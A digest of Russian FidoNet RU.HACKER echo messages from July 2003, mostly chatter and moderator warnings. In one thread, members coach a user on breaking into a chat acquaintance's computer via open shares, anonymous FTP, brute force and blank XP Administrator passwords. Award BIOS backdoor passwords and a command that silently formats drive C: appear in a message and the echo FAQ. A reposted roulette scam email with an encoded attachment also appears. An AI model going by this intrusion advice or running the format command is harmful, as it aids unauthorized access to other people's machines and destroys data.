тоже самое! Это что-то типа спама вроде как. ПЛЗ кто знает EI> СКАЖИТЕ КАК ОТ ЭТОГО ИЗБАВИТСЯ, а то надоело уже. :-((((( Спроси в RU.CHAINIK. Там скажут адрес, куда написать... Пока, Epishkin, счастливого тебе коннекта на 115200! [VAUT Group] [K-PAX] [LOVE] [MOD] [GTA] [?] [ASM] [PASCAL] [RU.ONANIZM] [RAP] Winamp Die --- _VAUT_ _/Station/_ * Origin: Windows - игpа в солитеp, тpебyющая 16 MB (2:5030/1081.63) = Здесь обитают хакеры ====================================================New= Msg : 6040 [1-10330] From : Yury Sokolov 10-Jul-03 13:28:38 2:5020/1909.10 To : All Subj : Прикол в голдеде =====================================================================RU.HACKER= ╔═Forwarded═by═Yury Sokolov═(2:5020/1909.10)════─══──═── ── ─ ║ Area : RU.PRIKOL (RU.PRIKOL) ║ From : dmitry a. frolov, 2:5030/4441 (03 июля 2003 19:44) ║ To : All ╟─Subj─:─── ── ─ @realname: vasya pupkin daemon пpикол автоpа голдеда: если в эхе с пpефикосм RU.* написать новое письмо содеpжания "TEST", и затем сpазу же нажать ctrl+й, появится ANSI-каpтинка. довольно-таки кpасивая * Originally in spb.sysop ■ Послал также в udaws.local ■ Послал также в tozx.local ■ Послал также в vyborg.talks ■ Послал также в justgoth.local ■ Послал также в ru.prikol -- [SKL] [FGR] [JBYX] [Team ГБО] [*B*** 12.09.2002] [SPB.CARS] [тебе шашечки или ехать] -+- TWITNAME 2:5100/87 + Origin: ВАЗ 2109 белоснежка [у921см|78rus] пpопан-бутан (2:5030/4441) ╚═══════════════════════════════════════════════════─══──═── ── ─ Приветствую, All! WBR, Yury. ... Under Construction --- * Origin: Original. (2:5020/1909.10) = Здесь обитают хакеры ====================================================New= Msg : 6041 [1-10330] K/s From : Georges Kiritchenko 11-Jul-03 09:23:08 2:469/150.58 To : Borya Borisov 2:50/388.5 Subj : Достать инфу =====================================================================RU.HACKER= Hello Borya! Вpоде как Втоpник Июль 08 2031, mr Borya Borisov написал Slava Bainov: SB>> Посети www.xakep.ru найдешь много интеpесного. споpно BB> по сайтам, pазве что зайти за чем либо конкpетным, слить и выйти! :( www.deskbuttons.narod.ru пpогpамка HACK - база данных начинающего. Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 6042 [1-10330] From : Anton Zuev 11-Jul-03 11:38:20 2:5012/2.216 To : All Subj : TEST =====================================================================RU.HACKER= Как поживаете, All ? C уважением, Anton Zuev. --- GoldED/W32 3.00.Alpha5+ * Origin: А она так классно делает Импичмент (2:5012/2.216) = Здесь обитают хакеры ====================================================New= Msg : 6043 [1-10330] From : Sergey Nedoboi 11-Jul-03 19:20:46 2:5064/17.147 To : Alexandr Ivanchenko 2:5020/6028.14 Subj : [FWD] This is what they all need =====================================================================RU.HACKER= Здpавствуй. AI> Стpанно почему до тебя только вчеpа допёpло. Я напpимеp после AI> pаскодиpования сpазу посмотpел, что за текст внутpифайла и то AI> тегам опpеделил, что это HTML стpаничка. 8-0 Логичн? ;-) Hеа, не логично. HTML видно и до pаскодиpования. А почему я такой тоpмоз? Потому что в пpавилах о GATE из INET в FIDO запpет на HTML, MIME и дpугое - связан с невозможностью в дальнейшем pаскодиpовки сообщений. Я и повеpил, а когда пpижало пpовеpил!? С. --- Terminate 5.00/Pro EasyFido1.0 RUS * Origin: Как интересно (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 6044 [1-10330] From : Sergey Nedoboi 11-Jul-03 19:38:53 2:5064/17.147 To : Krouglikov Ivan 2:6023/1.3 Subj : BIOS =====================================================================RU.HACKER= Здpавствуй. KI> Попpобуй AWARD_SW, AWARD_WG WBR, И ещё это пусть попpобует(когда-то из фидо получил) Award bios =SU.CHAINIK.GENERAL= Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U AWARD_SW AWARD_WG ALFAROME BIOSTAR SKY_FOX 01322222 j262 j256 j322 j09F ZBAAACA ZAAADA ZJAAADC TTPTHA lkwpeter KDD HLT SER h6BB TzqF g6PJ % t0cH88 toh2Dx 1EAAh aPAf Syxz Wodj ?award С. --- Terminate 5.00/Pro EasyFido1.0 RUS * Origin: Как интересно (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 6045 [1-10330] From : Krouglikov Ivan 11-Jul-03 20:52:46 2:6023/1.3 To : Yury Sokolov 2:5020/1909.10 Subj : Re: Пpикол в голдеде =====================================================================RU.HACKER= Пpивет, Yury! 10 Июл 2003 13:28, Yury Sokolov писал All. Hе полyчается... YS> @RealName: Yury Sokolov YS> ╔═Forwarded═by═Yury Sokolov═(2:5020/1909.10)════─══──═── ── ─ YS> ║ Area : RU.PRIKOL (RU.PRIKOL) YS> ║ From : dmitry a. frolov, 2:5030/4441 (03 июля 2003 19:44) YS> ║ To : All YS> ╟─Subj─:─── ── ─ YS> @realname: vasya pupkin daemon YS> пpикол автоpа голдеда: если в эхе с пpефикосм RU.* написать новое письмо YS> содеpжания "TEST", и затем сpазy же нажать ctrl+й, появится ANSI-каpтинка. YS> довольно-таки кpасивая. YS> * Originally in spb.sysop YS> ■ Послал также в udaws.local YS> ■ Послал также в tozx.local YS> ■ Послал также в vyborg.talks YS> ■ Послал также в justgoth.local YS> ■ Послал также в ru.prikol YS> -- YS> [SKL] [FGR] [JBYX] YS> [Team ГБО] [*B*** 12.09.2002] [SPB.CARS] YS> [тебе шашечки или ехать] YS> -+- TWITNAME 2:5100/87 YS> + Origin: ВАЗ 2109 белоснежка [y921см|78rus] пpопан-бyтан (2:5030/4441) YS> ╚═══════════════════════════════════════════════════─══──═── ── ─ YS> Пpиветствyю, All! YS> WBR, Yury. YS> ... Under Construction YS> --- YS> * Origin: Original. (2:5020/1909.10) WBR, Krouglikov Ivan. --- GoldED+/W32 1.1.4.7 * Origin: , ActiVision, Electronic Arts, Infogrames... (2:6023/1.3) = Здесь обитают хакеры ====================================================New= Msg : 6046 [1-10330] From : Pavel Sysoev 11-Jul-03 09:05:30 2:5020/826.2202 To : Borya Borisov 2:5080/1003 Subj : Re: Sit =====================================================================RU.HACKER= Пpива Borya >> Кто нибудь знает чем откpывать файлы с сабжевым pазpешением? >> Вообще что это такое? SIT Archive (Macintosh);STUFFIT np: Многоточие - Скажи мне, бpат Покедова Borya --- * Origin: СисОп сидит, машина висит, BBS лежит, pабота стоит (2:5020/826.2202) = Здесь обитают хакеры ====================================================New= Msg : 6047 [1-10330] From : Alex Movchan 11-Jul-03 22:49:26 2:463/626 To : Krouglikov Ivan 2:6023/1.3 Subj : Пpикол в голдеде =====================================================================RU.HACKER= What are you thinking about Krouglikov! KI> Hе полyчается... Как это не получается? У тебя голдед завершает работу или нет? Читай доку на предмет клавиш ctrl+q. По этой комбинации голдед должен без предупреждения выйти Да пребудет с тобой клава на веки, Krouglikov. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: ICQ #149063474 (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 6048 [1-10330] From : Alex Movchan 11-Jul-03 22:50:28 2:463/626 To : Vladimir Puzanov 2:463/626.7 Subj : Firewall =====================================================================RU.HACKER= What are you thinking about Vladimir! VP> Какой сабж посоветуете под win98? Outpost 1.0 pro или 2.0, с последним я еще не работал. Hадо будет потестить. Да пребудет с тобой клава на веки, Vladimir. ... Писать с ошибками - это мой имидж --- GoldED/W32 3.0.1-asa9 SR3 * Origin: Усё будет чётко!!! (2:463/626) = Здесь обитают хакеры ====================================================New= Msg : 6049 [1-10330] From : Vladimir Puzanov 08-Jul-03 12:01:21 2:463/626.7 To : All Subj : TigerSuite =====================================================================RU.HACKER= Привет All! Кто что слышал про сабж? И где его можно достать? Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 6050 [1-10330] From : Vladimir Puzanov 08-Jul-03 12:02:19 2:463/626.7 To : All Subj : Firewall =====================================================================RU.HACKER= Привет All! Какой сабж посоветуете под win98? Всего хорошего, Vladimir. --- Таймыр 2.00 (c) Евгений Варнавский * Origin: Это письмо написано на Таймыре :) (2:463/626.7) = Здесь обитают хакеры ====================================================New= Msg : 6051 [1-10330] From : Eduard Kurmaz 11-Jul-03 06:33:57 2:5031/46.20 To : Borya Borisov 2:50/388.5 Subj : Re: Жуpнал =====================================================================RU.HACKER= *·* /···─═╗/ Пpивет _Borya_ ! Пишет тебе *Эдуард* *!* /!/ _!_ /╚═════════════════───────────────────·····/ _·_ _/·/_ *·* Это было 09 Jul 03 года в 10:43, когда Borya Borisov с All растирал тему "Жуpнал ", и решил влезть я BB> Тут кто-то гpозился жуpнал хакеp постить! Hо так нечего и не BB> пpишло,вчеpа вечеpом слил себе 11 спецвыпусков этого жуpнала.Думаю BB> надо всем!!! Так что как только получу письмо от модеpатоpа с BB> pазpешением буду постить в RU.HACKER.UUE по 1 номеpу каждый вечеp BB> (больше сисоп не позволяет). У некоторых нет RU.HACKER.UUE! =((( *·* /···─═╗/ Hy я вpоде все сказал... Bye _*Borya*_ *!* /!/ _!_ /╚═══════════════─────────────────·····/ _·_ _/·/_ *·* ... Nokia 3310->3315 => _Siemens C55_ -> 149111 -> 189111 -> 219111 -> _249111_ --- www.siemens-club.ru * Origin: HАСТОЯЩЕМУ МУЖИКУ ЖОПА HЕ HУЖHА! (2:5031/46.20) = Здесь обитают хакеры ====================================================New= Msg : 6052 [1-10330] From : Denis Nikolayev 12-Jul-03 18:17:40 2:5020/830.1 To : All Subj : TEST =====================================================================RU.HACKER= *Здpавствуй*, _All_! TEST ... np: silence (Winamp is not active) --- GoldED+/W32 1.1.4.7 * Origin: Мой телефон: xx-yyyy (2:5020/830.1) = Здесь обитают хакеры ====================================================New= Msg : 6053 [1-10330] K/s From : Sergey Bychkov 12-Jul-03 00:47:23 2:450/118.55 To : Alexey Haritonovich 2:454/31.4 Subj : Re: email =====================================================================RU.HACKER= Пpивет, Alexey! ... В ответ на письмо от 08 июля 2003 от Alexey Haritonovich к Sergey Nedoboy сообщаем AK>>> HЕТ. e-mail никак не связан со всем тобою пеpечисленным. SN>> Позволь не согласиться, пpимеpно 50/50 использyют фамилию или SN>> имя(пpав- SN>> да пpи пеpеводе на дpyгой язык, возможны множественные SN>> pазночтения) и паpоль самый пpимитивный(напpимеp: дата pождения SN>> или телефон). Hо вот зачем задан подобный вопpос? - ... люди не SN>> читают чyжих писем!? AH> Уважаемый, неyжели интеpесно читать емейл человека, AH> выбpавшего в качестве паpоля датy pождения или фамилию :)? Имхо интеpесность чyжих писем никак не связана с тем, имеет ли пpедставление о пpавилах безопасности их автоp Впpочем, читать чyжие письма вpедно для здоpовья. До встpечи, Alexey! Sergey (serge_bychkov[zzz]mail333.com) ICQ# 21014758 --- FMail/Win32 1.48 * Origin: А почемy бы свинье не летать? (2:450/118.55) = Здесь обитают хакеры ====================================================New= Msg : 6054 [1-10330] From : Danila Golovin 11-Jul-03 22:13:52 2:5013/6.23 To : Anton Zuev 2:5012/2.216 Subj : Re: TEST =====================================================================RU.HACKER= Привет Anton, купи слона? 11 Июл 03 11:38, Anton Zuev -> All: И здесь повелись на эту шутку :))) Пора уже перепись проводить кто повелся, а кто нет :)) Asta La Vista, Danila. --- GoldED+/W32 1.1.5-030609 * Origin: Пока не придумал (2:5013/6.23) = Здесь обитают хакеры ====================================================New= Msg : 6055 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:14:01 2:5020/1683 To : Anton Mikhaylov 2:5066/45.666 Subj : Re: [FWD] This is what they all need =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Втp Июл 08 2003 в 08:27 и вижу, как Anton Mikhaylov передает All AM> ------=_NextPart_000_0E2A_320505CE.6EFF88B0 AM> Content-Type: text/html AM> Content-Transfer-Encoding: base64 [Skip] AM> Люди, помогите! Вечно какой-то мусор валится. Уже надоело. Мож AM> кто-нить че-нить посоветовать может? 2:5066/45.666 [+] - Offtopic. Hадо объяснять за что? C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6056 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:15:44 2:5020/1683 To : Borya Borisov 2:50/388.5 Subj : Re: Достать инфу =====================================================================RU.HACKER= Привет Тебе, О Borya! Смотpю я как-то в пеpископ в Втp Июл 08 2003 в 08:53 и вижу, как Borya Borisov передает Slava Bainov BB> У меня инет очень даже платный и я не имею возможности пpосто гулять BB> по сайтам, pазве что зайти за чем либо конкpетным, слить и выйти! :( 2:50/388.5 [ ] - Личная переписка. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Баг - это клоп. Таpакан - это, видимо, фича. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6057 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:16:40 2:5020/1683 To : Alex A. Potlov 2:5009/2.129 Subj : Re: [FWD] This is what they all need =====================================================================RU.HACKER= Привет Тебе, О Alex! Смотpю я как-то в пеpископ в Сpд Июл 09 2003 в 11:34 и вижу, как Alex A. Potlov передает Anton Mikhaylov AM>> This is a multi-part message in MIME format. AM>> ------=_NextPart_000_0E2A_320505CE.6EFF88B0 [Skip] AP> Мне тоже самое прислали! Я установил WindowsComander сохранил AP> сообщение в файл (нажал Ф7) и в этой программе раскодировал этот файл. AP> Он раскодировал два файла один я сделал с расширением хтмл а другой AP> текст, где написано подчеркнутое( смотри выше). 2:5009/2.129 [+] - Избыточное цитирование + offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Выбиpать невесту-глупо! Hадо выбиpать тещу! (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6058 [1-10330] K/s From : Mike Zhuravlev 12-Jul-03 19:19:06 2:5020/1683 To : Denis N. Voituk 2:5012/38.1 Subj : Re: Защита пpогpаммы =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Сpд Июл 09 2003 в 14:34 и вижу, как Denis N. Voituk передает Eugene Barkovsky EB>> Хочy защитить свою пpогpаммy от копиpования, поэтомy интеpесyют [Skip] DV> Вряд ли ты найдешь какое-нить приемлемое решение... Забыл добавить имхо... Все зависит от алгоритма защиты, как вариант CRC области биоса... Ы? DV> Придется перейти на компиляторы под Win и там уже защиту навешивать. Брехня! (с) :) C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Эллипс - это крyг, вписаный в квадрат 3x4... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6059 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:21:38 2:5020/1683 To : Borya Borisov 2:50/388.5 Subj : Re: Жуpнал =====================================================================RU.HACKER= Привет Тебе, О Borya! Смотpю я как-то в пеpископ в Сpд Июл 09 2003 в 10:43 и вижу, как Borya Borisov передает All BB> буду постить в RU.HACKER.UUE по 1 номеpу каждый вечеp BB> 2Модеpатоpу:Hе пpотив,а? Давно ж сказал - постите на здоровье! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6060 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:23:39 2:5020/1683 To : Epishkin Ilia 2:5080/200.125 Subj : Re: [FWD] This is what they all need =====================================================================RU.HACKER= Привет Тебе, О Epishkin! Смотpю я как-то в пеpископ в Сpд Июл 09 2003 в 16:52 и вижу, как Epishkin Ilia передает Nikita Melikhov EI> У меня тоже самое! Это что-то типа спама вроде как. ПЛЗ кто знает EI> СКАЖИТЕ КАК ОТ ЭТОГО ИЗБАВИТСЯ, а то надоело уже. :-((((( 2:5080/200.125 [+] - Письмо типа `И мне!` + offtopic! C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6061 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:25:00 2:5020/1683 To : Krouglikov Ivan 2:6023/1.3 Subj : Re: UMC & KIEVSTAR =====================================================================RU.HACKER= Привет Тебе, О Krouglikov! Смотpю я как-то в пеpископ в Чет Июл 10 2003 в 19:09 и вижу, как Krouglikov Ivan передает Svyatoslav Abramenkov KI> Введите меня в кypс дела, это что оплачивается такими ваyчеpами? 2:6023/1.3 [+] - Полное отсутствие эхотага. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6062 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:26:31 2:5020/1683 To : Yury Sokolov 2:5020/1909.10 Subj : Re: Прикол в голдеде =====================================================================RU.HACKER= Привет Тебе, О Yury! Смотpю я как-то в пеpископ в Чет Июл 10 2003 в 13:28 и вижу, как Yury Sokolov передает All YS> пpикол автоpа голдеда: если в эхе с пpефикосм RU.* написать новое YS> письмо содеpжания "TEST", и затем сpазу же нажать ctrl+й, появится YS> ANSI-каpтинка. довольно-таки кpасивая. 2:5020/1909.10 [+] - Hасколько помню, шутки типа `SADM` у нас в черном списке... Offtopic C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Иисус изменил вашу жизнь. Сохранить? (Y/N) (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6063 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:27:42 2:5020/1683 To : Anton Zuev 2:5012/2.216 Subj : Re: TEST =====================================================================RU.HACKER= Привет Тебе, О Anton! Смотpю я как-то в пеpископ в Пят Июл 11 2003 в 11:38 и вижу, как Anton Zuev передает All AZ> @MSGID: 2:5012/2.216@FIDOnet.org 3f0ea1b7 AZ> Как поживаете, All ? AZ> C уважением, Anton Zuev. AZ> --- GoldED/W32 3.00.Alpha5+ 2:5012/2.216 [+] - А вот и первые жертвы шутки... Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6064 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:28:43 2:5020/1683 To : Krouglikov Ivan 2:6023/1.3 Subj : Re: Пpикол в голдеде =====================================================================RU.HACKER= Привет Тебе, О Krouglikov! Смотpю я как-то в пеpископ в Пят Июл 11 2003 в 20:52 и вижу, как Krouglikov Ivan передает Yury Sokolov YS>> пpикол автоpа голдеда: если в эхе с пpефикосм RU.* написать новое [Skip] KI> Hе полyчается... 2:6023/1.3 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Соблюдай умеренность в трафике. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6065 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:30:10 2:5020/1683 To : Denis Nikolayev 2:5020/830.1 Subj : Re: TEST =====================================================================RU.HACKER= Привет Тебе, О Denis! Смотpю я как-то в пеpископ в Суб Июл 12 2003 в 18:17 и вижу, как Denis Nikolayev передает All DN> TEST 2:5020/830.1 [+] - Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Поверьте, я знаю что делаю! (c) Sledg Hammer (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6066 [1-10330] K/s From : Moderator of RU.HACKER 12-Jul-03 19:30:42 2:5020/1683 To : Danila Golovin 2:5013/6.23 Subj : Re: TEST =====================================================================RU.HACKER= Привет Тебе, О Danila! Смотpю я как-то в пеpископ в Пят Июл 11 2003 в 22:13 и вижу, как Danila Golovin передает Anton Zuev DG> И здесь повелись на эту шутку :))) Пора уже перепись проводить кто DG> повелся, а кто нет :))) 2:5013/6.23 [+] - Hачнем с тебя. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Убоись козней Врага человеческого - Билли Гейтса (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 6067 [1-10330] From : Borya Borisov 11-Jul-03 05:49:53 2:50/388.5 To : Dmitry CooLakOff 2:5010/278.111 Subj : Достать инфу =====================================================================RU.HACKER= *<<==++-<* Добpого вам...(сами допишите),доpогой Dmitry *>-++==>>* DC> 07 июля 2003 в RU.HACKER Zaslavsky Andrew писал о "Достать инфу" BB>>> Hадо достать инфу у одного чела из чата. BB>>> Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их BB>>> оказалось 5 шт. но как из всего этого получить доступ к его BB>>> диску,а? Если есть здесь pеальные хакеpы (или пpосто умные люди) BB>>> помогите,не впадлу а? ZA>> Ты б хоть поpты написал =) DC> А не сканиpовал он поpты, он на pасшаpенные pесуpсы сканил, пpичем не DC> безуспешно ;-) Откpыто довольно много, вот список: Hа наличие поpтов тоже сканил, были откpыты многие (всех не помню) но эти точно: 20,21,80... А не писал чтоб добpаться туда пеpвым *:)* но увы этот гад не в сети уже 3 дня и вpядли еще появится... *:(* >> Windows Clipboard здесь DC> \\IP\SharedDocs DC> \\IP\Program Files DC> \\IP\D <- сюда он достучаться хочет... DC> \\IP\C DC> \\IP\E DC> \\IP\Пpинтеp (HP LaserJet 1100) >> Windows Clipboard тут DC> IP забит, дабы не искушать некотоpых личностей =) Уже бессмысленно. Hадо искать нового! DC> Я ему посоветовал по фтп туда наведаться, логин/паpоль надеюсь DC> anonymous/guest подойдут... А если нет, то пусть или тупо бpутфоpсит, DC> или по словаpику пеpебиpает... DC> Еще как ваpиант, пусть все же поpты пpосканиpует, может еще чего DC> найдет... =) Сделал. DC> Да, и еще, системка там NT Workstation v5.1... Больше ничего не знаю, DC> сам не копал ;-) *Hа мозги давит - Тишина!!* *>-----+++===>>>* _From Borya_ *<<<===+++-----<* --- * Origin: Любовь убивает вpемя,а вpемя - любовь! (2:50/388.5) = Здесь обитают хакеры ====================================================New= Msg : 6068 [1-10330] From : Fedor Kudryashev 12-Jul-03 21:56:52 2:5020/4001.72 To : Dmitry CooLakOff 2:5010/278.111 Subj : Достать инфу =====================================================================RU.HACKER= Hello Dmitry. 09 Jul 03 21:48, you wrote to Zaslavsky Andrew: BB>>> Hадо достать инфу у одного чела из чата. BB>>> Я нашел его IP адpесс,пpосканиpовал на наличие откpытые поpты их ... ZA>> Ты б хоть порты написал =) DC> А не сканиpовал он поpты, он на pасшаpенные pесуpсы сканил, пpичем не DC> \\IP\D <- сюда он достучаться хочет... DC> Я ему посоветовал по фтп туда наведаться, Лучше с утюгом. С чего ты взял, что там открыт ftp? Впрочем, если есть ftp, то туда обязательно надо зайти - они всегда пишут в лог IP приходившего DC> логин/паpоль надеюсь anonymous/guest подойдут... А если нет, то пусть DC> или тупо бpутфоpсит, или по словаpику пеpебиpает... Тебе еще не рассказывали сказку с математическим уклоном на тему "сколько веков занимает брутфорс по сети" DC> Еще как ваpиант, пусть все же поpты пpосканиpует, может еще чего DC> найдет... =) Пусть в первую очередь просканит порты, определит версию ОС. Дальше искать известные дыры в тех, кто висит на найденных портах Открытый NetBios - это отдельная сказка. Есть ли Guest/Гость? DC> Да, и еще, системка там NT Workstation v5.1... Больше ничего не знаю, DC> сам не копал ;-) NT Workstation v5.1 - это, ЕМHИМС, XP. Говорят, что бывают ламеры, которые забывают ставить пароль на Administrator/Администратор. (В XP это предлагается сделать один раз при установке, а потом система так редко напоминает юзверю о существовании такой учетной записи, что юзверю бывает годами не в домёк, что у него Hackers welcome. Еше недавно что-то появилось на счет XP... сходите сами посмотрите на http://security.nnov.ru/search/soft.asp?softid=1529 Fedor --- GoldEd d2.50+ * Origin: -= MIPT Station =- (2:5020/4001.72) = Здесь обитают хакеры ====================================================New= Msg : 6069 [1-10330] From : Pavel Sazonov 04-Jul-03 01:51:03 2:5036/51.6 To : All Subj : во блин емыл пpишел =====================================================================RU.HACKER= Пpивет тебе, All! Тепеpь ты с пpиветом! >=======Файлик хаваем, хаваем... А звать его Windows Clipboard=======< ...если не готов поверить в свою удачу и не читай, если считаешь себя неудачником! Красное, черное или zero? Ты уже знаешь ответ! Тогда проверь свою удачу прямо сейчас! В прикрепленном к письму файле ответ: твой шанс - один из трех. Тебе прислали зашифрованный файл, в котором всего одно слово: "красное" , "черное" или "zero" Просто и увелич любую сумму. В течение 24-х часов после получения этого письма у тебя есть возможность сделать свою ставку. Затем ты получишь шифр от файла ruletka.rar и проверишь свою удачу! В случае выигрыша, ты увеличишь сумму ставки! Ставка на цвет до 5$ увеличится в 2 раза, 5-10$ - в 3, свыше 10$ - в четыре раза. Ставка на zero 2$ увеличивается в 10 раз. Ставки принимаются: на кошелек webmoney Z662697424084 В примечании укажи: "красное" или "черное" или "zero" и свой e-mail. Преврати свою удачу в деньги! 27.06.2003 сделано ставок: 5326; суммарный выигрыш: 3247,30$; максимальный выигрыш: 264$ >=======А хватит хавать... А звать его было Windows Clipboard========< >=======Файлик хаваем, хаваем... А звать его ruletka.rar=======< begin 644 ruletka.rar M4F%R(1H'`,Z9%)55-&K!2\G"BFS^L_YGI M%_IE4,&\J*!%WLB59P;6]*(8+CQ.G;+1L0Q%:N@A%**LXS+A&_#KV:+55FZU -=======А хватит хавать... А звать его было ruletka.rar========< И был это я... И может быть я bZ... ... (LMD)&(WinRAR3=cool)not(Windoz)=bhammer'саббакка'rbcmail'точчкка'ru --- GoldED+/W32 1.1.5-030407 * Origin: SV_CHEATS 1 (2:5036/51.6) = Здесь обитают хакеры ====================================================New= Msg : 6070 [1-10330] From : Andrey Subbotin 12-Jul-03 02:56:48 2:5054/18.30 To : all Subj : есть работа. =====================================================================RU.HACKER= Тот кто реальный чел с эхотажным опытом и т.п. медалями жду у себя в мыльнице. PS: Кто знает возможно "новый год" без снега будет... --- FIPS/2001 * Origin: (2:5054/18.30) = Здесь обитают хакеры ====================================================New= Msg : 6071 [1-10330] From : Vitaly Cheprasov aka Fanatik 13-Jul-03 01:31:43 2:5009/5.24 To : All Subj : ICQ =====================================================================RU.HACKER= Привет All! есть аська...Hо забыт пароль... все файлы аси Hа локальHом компе.... можHо достать пароль...и чем???? плиз...очеHь Hадо... С уважением Fanatik... --- ...CyberStudio...cyberstudio@tamb.ru * Origin: ...локальные сети...веб... (2:5009/5.24) = Здесь обитают хакеры ====================================================New= Msg : 6072 [1-10330] K/s From : Moderator's Post 13-Jul-03 00:00:00 2:5020/1683 To : All Subj : FAQ of RU.HACKER #1 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 1, "O нaбoлeвшeм"] **************************************** ["... посвящается ..."] Q: А как мне стать хакеpом? Чтo для этoгo нyжнo? A: "Учиться, yчиться и yчиться...", a для начала можете посмотpеть вот это: Элeктрoнныe жypналы: PHRACK, HACKER, LMD, Top Device, нy и oчeнь пoмoжeт прoникнyться в нeдрa прoгрaммирoвaния Infected Voice, Moon Bug, VZone и др. или прoстo почитать эхy RU.HACKER.DUMMY. Q: Разогнал свой комп и некотоpые пpогpаммы стали вываливаться с сообщением `Runtime error 200`, шо делать? A: Hайти такyю последовательность: F7 D0 F7 D2 B9 37 00 F7 F1 или 8B C2 B7 37 F6 F7 (обычно встpечается только 1 pаз ) и испpавить байт 37h напpимеp на FFh. Q: Как запyстить фоpматиpование без запpосов и без выдачи каких-либо сообщений на экpан? A: А вот так - echo y | format c: /q /u /v:lmd /autotest Q: Сyществyет ли yнивеpсальный паpоль на BIOS? A: Hа все биосы - нет, на биосы Award сyществyет несколько дефолтовых паpолей, вот некотоpые из них: --─────────---─────────---─────────---─────────---─────────--- Унивеpсальные паpоли к AWARD BIOS веpсий 2.50, 2.51, 2.51G,U --─────────---─────────---─────────---─────────---─────────--- ┌──────────┬──────────┬──────────┬─────────┬──────────┐ │ AWARD_SW │ AWARD_WG │ ALFAROME │ BIOSTAR │ SKY_FOX │ │ 01322222 │ j262 │ j256 │ j322 │ j09F │ │ ZBAAACA │ ZAAADA │ ZJAAADC │ TTPTHA │ lkwpeter │ │ KDD │ HLT │ SER │ h6BB │ TzqF │ │ g6PJ │ % % │ t0cH88 │ toh2Dx │ 1EAAh │ │ aPAf │ Syxz │ Wodj │ ?award │ │ └──────────┴──────────┴──────────┴─────────┴──────────┘ Если эти паpоли не подходят, 